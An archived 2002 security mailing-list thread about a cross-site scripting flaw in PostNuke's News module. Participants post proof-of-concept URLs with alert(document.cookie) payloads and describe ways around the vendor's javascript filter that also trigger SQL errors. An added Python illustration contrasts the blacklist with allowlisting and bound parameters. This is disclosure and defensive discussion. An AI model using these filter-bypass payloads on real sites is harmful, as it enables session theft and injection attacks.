Re: Postnuke XSS fixed

2002-10-07 Thread Muhammad Faisal Rauf Danka

Now it is redirecting back to /index.php on all attempts mentioned 
previously; no more HTTP VARIABLE error.

Regards

Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202




Re: Postnuke XSS fixed

2002-10-03 Thread Muhammad Faisal Rauf Danka

I just checked it again:

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=alert(document.cookie);

where + denotes a blank space, or similarly this one:

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=alert(document.cookie);

resulting in the "Sorry - $HTTP_GET_VARS contains javascript..." message.

However, the request:
?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);

or any character inserted before the first "script" and after the first less-than sign "<", 
results in a DB Error, revealing nothing (user/pass/path etc.).

But I used IE and Netscape; maybe it's different with other browsers. :)

Regards

Muhammad Faisal Rauf Danka



--- Daniel Woods <[EMAIL PROTECTED]> wrote:
>
>Humm!
>
>> on 26th Sep the following URL:
>> http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=alert(document.cookie);
>>
>> used to give Alert PopUp and
>> Error:
>> DB Error: getArticles: 1064: You have an error in your SQL syntax near '='
>> at line 23
>>
>> now it gives:
>> Sorry - $HTTP_GET_VARS contains javascript...
>>
>> Prompt fix by PostNuke team, great work Keep it up! :)
>
>Not so fast on the praise :(
>
>It only took me a couple of workarounds to find ways to bypass the check.
>
> http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=alert(document.cookie);
>
>Using the request...
>?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);
>gives me the DB Error: message
>
>And using the request...
>?op=modload&name=News&file=article&sid=alert(document.cookie);
>gives me the Alert Popup and DB Error: message... the '+' is treated as a blank.
>
>Thanks... Dan.
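As an added illustration (not code from PostNuke or from anyone in this thread), the snippet below mimics the kind of substring blacklist the thread describes, shows that the variants discussed here slip past it, and contrasts it with what a defender would do for a numeric article id: allowlist the value and bind it as a query parameter. The in-memory table, the article row and the exact blacklist rule are constructed assumptions.

```python
import html
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed stand-in for the check the thread describes: look for a literal
# "<script" in the decoded query values and refuse the request if found.
# This is not PostNuke's code; the real check is not on the page.
def blacklist_rejects(query: str) -> bool:
    params = parse_qs(query, keep_blank_values=True)
    return any("<script" in v.lower() for vals in params.values() for v in vals)

def validate_sid(raw: str):
    """Allowlist instead of blacklist: an article id is a short decimal integer.
    Returns the int, or None if the value is anything else."""
    return int(raw) if re.fullmatch(r"[0-9]{1,9}", raw) else None

def lookup_article(query: str, conn: sqlite3.Connection):
    """Parse sid from the query string, validate it, and fetch it with a bound
    parameter so the raw value can never reach the SQL parser as syntax.
    Returns (title, error_message); exactly one of the two is None."""
    params = parse_qs(query, keep_blank_values=True)
    raw = params.get("sid", [""])[0]
    sid = validate_sid(raw)
    if sid is None:
        # Escape before echoing so a rejected value cannot become markup.
        return None, "Sorry - invalid article id: " + html.escape(raw)
    row = conn.execute("SELECT title FROM articles WHERE sid = ?", (sid,)).fetchone()
    return (row[0] if row else None), None

def demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the news articles."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (sid INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO articles VALUES (23, 'Constructed sample article')")
    return conn

if __name__ == "__main__":
    # The variants from the thread: the blacklist catches the plain tag but not
    # the backslash variant or the '+'-as-space variant, which therefore reach
    # the database layer; the allowlist rejects all three and accepts only ids.
    base = "op=modload&name=News&file=article&sid="
    conn = demo_db()
    for payload in ["<script>alert(1)", "<\\script>alert(1)", "<+script>alert(1)", "23"]:
        q = base + payload
        print(f"{payload!r:24} blacklist_rejects={blacklist_rejects(q)!s:5}",
              "allowlist ->", lookup_article(q, conn))
```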




Re: Postnuke XSS fixed

2002-10-03 Thread Sebastian Konstanty Zdrojewski

I saw the problem has been solved, and the GETs you proposed below are no
longer working. But if you use the following GET, the popup appears again:

on the url http://news.postnuke.com/modules.php

the get

?op=modload&name=News&file=article&sid=alert(document.cookie);

Best Regards,

Sebastian

Daniel Woods wrote:

  >Humm!
  >
  >Not so fast on the praise :(
  >
  >It only took me a couple of workarounds to find ways to bypass the check.
  >
  > http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=